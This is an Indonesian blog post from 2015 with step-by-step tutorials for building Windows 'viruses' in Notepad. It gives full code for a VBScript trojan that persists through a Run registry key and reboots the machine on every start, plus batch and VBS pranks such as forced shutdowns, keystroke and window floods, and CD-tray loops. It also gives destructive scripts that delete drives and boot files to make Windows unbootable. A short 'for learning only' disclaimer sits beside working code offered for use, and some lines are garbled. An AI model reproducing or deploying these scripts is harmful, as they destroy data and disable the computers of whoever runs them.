Powered By Blogger

website

Join The Community

Premium WordPress Themes

Jumat, 22 Mei 2015

Cara Membuat Virus Trojan


CARA MEMBUAT VIRUS TROJAN 


1. Buka Notepad lu > All Program > Notepad
2. Copy Paste Script Berijut ini ke Notepad Lu tadi 
set FSobj=CreateObject(“Scripting.FileSystemObject”)
set sysDir = FSobj.GetSpecialFolder(1)
createRegKey “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\dlRB”,sysDir&”\dlRB.vbs”
sub createRegKey(regKey,regVal)
set regEdit = CreateObject(“WScript.Shell”)
regEdit.RegWrite regKey,regVal
end sub
set generateCopy=FSobj.CreateTextFile(sysDir+”\dlRB.vbs”)
generateCopy.close
set newFile = FSobj.OpenTextFile(WScript.ScriptFullname,1)
setFile()
fixedCode=replace(fileData,chr(94),”"”")
set procreateCopy=FSobj.OpenTextFile(sysDir+”\dlRB.vbs”,2)
procreateCopy.write fixedCode
procreateCopy.close
rebootSystem()
function setFile()
fileData=”rem – ^dlRB^ by D.L.” &vbcrlf& _
“strComputer = ^.^ ” &vbcrlf& _
“Set objWMIService = GetObject(^winmgmts:^ _ ” &vbcrlf& _
“& ^{impersonationLevel=impersonate,(Shutdown)}!\\^ & strComputer & ^\root\cimv2^)” &vbcrlf& _
“Set colOperatingSystems = objWMIService.ExecQuery _ ” &vbcrlf& _
“(^Select * from Win32_OperatingSystem^)” &vbcrlf& _
“For Each objOperatingSystem in colOperatingSystems” &vbcrlf& _
“ObjOperatingSystem.Reboot()” &vbcrlf& _
“Next”
end function
function rebootSystem()
strComputer = “.”
Set objWMIService = GetObject(“winmgmts:” _
& “{impersonationLevel=impersonate,(Shutdown)}!\\” & strComputer & “\root\cimv2″)
Set colOperatingSystems = objWMIService.ExecQuery _
(“Select * from Win32_OperatingSystem”)
For Each objOperatingSystem in colOperatingSystems
ObjOperatingSystem.Reboot()
Next
end function
3. Dipikir secara logika ini adalah Coding script untuk me-reebot komputer 
4. oke tanpa basa basi silahkan simpan dengan format .vbs contoh gantengers.vbs dan jangan lupa pilih all files
5. Virus/Script kode perintah akan berjalan kalo lu klik , dan kalau mau coba ya silahkan yang rusak punya elu bukan gue :v

Peringatan Keras "Ini Hanyalah Sebuah Materi Pembelajaran dan jika terjadi kerusakan Sistem Perangkat Lunak Yang mengatasnamakan Blog Gantengers kami tidak akan bertanggung jawab Semua ditanggung oleh pengguna Kode Diatas dan ini hanya untuk bahan Pembelajaran bukan ditujukan untuk merusak dan dosa ditanggung pengguna".

Sekian , semoga bermanfaat bagi anda :) .

Cara Membuat virus


Cara Membuat Virus Komputer Dasar Dengan Notepad
1. Virus Untuk Membuat Komputer Shutdown 
[+] Pertama buka notepad lalu masukan kode dibawah ke dalam notepad

@echo off
msg * I'AM WATCHING YOU!
shutdown -c "Error Your PC is Load,.,.," -s\
[+] Lalu Save As beri nama homo1.vbs dan jangan lupa pilih jenis File (All Files)

2. Virus Untuk Membuat Komputer Shutdown Dengan Timer 
[+] Pertama buka notepad lalu masukan kode dibawah ke dalam notepad

@echo shutdown -s -t 2 -f 
[+] Angka 2 adalah timernya silahkan ganti sesuka lu bray
[+] Lalu Save As beri nama homo2.vbs dan jangan lupa pilih jenis File (All Files)

3. Virus Untuk Membuat Tombol Backspace Menekan Terus-Menerus  "sudah saya coba"
[+] Pertama buka notepad lalu masukan kode dibawah ke dalam notepad

MsgBox "Balik Lagi Bos!"Set wshShell =wscript.CreateObject("WScript.Shell")dowscript.sleep 100wshshell.sendkeys "{bs}"loop
[+] Lalu Save As beri nama homo3.vbs dan jangan lupa pilih jenis File (All Files)

4. Virus Untuk Membuat Notepad Terbuka Secara Otomatis  "sudah saya coba"
[+] Pertama buka notepad lalu masukan kode dibawah ke dalam notepad

@ECHO off:topSTART %SystemRoot%\system32\notepad.exeGOTO top
[+] Lalu Save As beri nama homo4.vbs dan jangan lupa pilih jenis File (All Files)

5. Virus Untuk Membuat DVD/CD ROOM terbuka sendiri "sudah saya coba"

[+] Pertama buka notepad lalu masukan kode dibawah ke dalam notepad

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
[+] Lalu Save As beri nama homo5.vbs dan jangan lupa pilih jenis File (All Files)
6. Virus Untuk Memformat Hardisk
[+] Pertama buka notepad lalu masukan kode dibawah ke dalam notepad

@echo off
DEL C: -Y
DEL D: -Y
[+] Lalu Save As beri nama homo6.vbs dan jangan lupa pilih jenis File (All Files)
[+] Resiko ditanggung pentester gue gak bertanggung jawab!


Bonus Tutorial Membuat Virus Ganas

[+] Pertama buka notepad lalu masukan kode dibawah ke dalam notepad
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
[+] Lalu Save As beri nama homo1.bat dan jangan lupa pilih jenis File (All Files)
[+] Keterangan Untuk Script Code Diatas
      - del c:\autoexec.bat = buat hapus autoexe.bat di direktori C
      - del c:\boot.ini          =  buat hapus Boot.ini di direktori C
      - del c:\ntldr               = buat hapus ntldr
      - del c:\windows\win.ini  = untuk hapus file win.ini yang berlokasi di C:/windows

      - attrib -r -s -h            =  untuk menampilkan file ke 4 windows tadi yang di supper hidden.


Sekian apabila ada kesalahan tolong di maaf kan , kalau mau tau cara membuat virus trojan , tinggal di klik link nya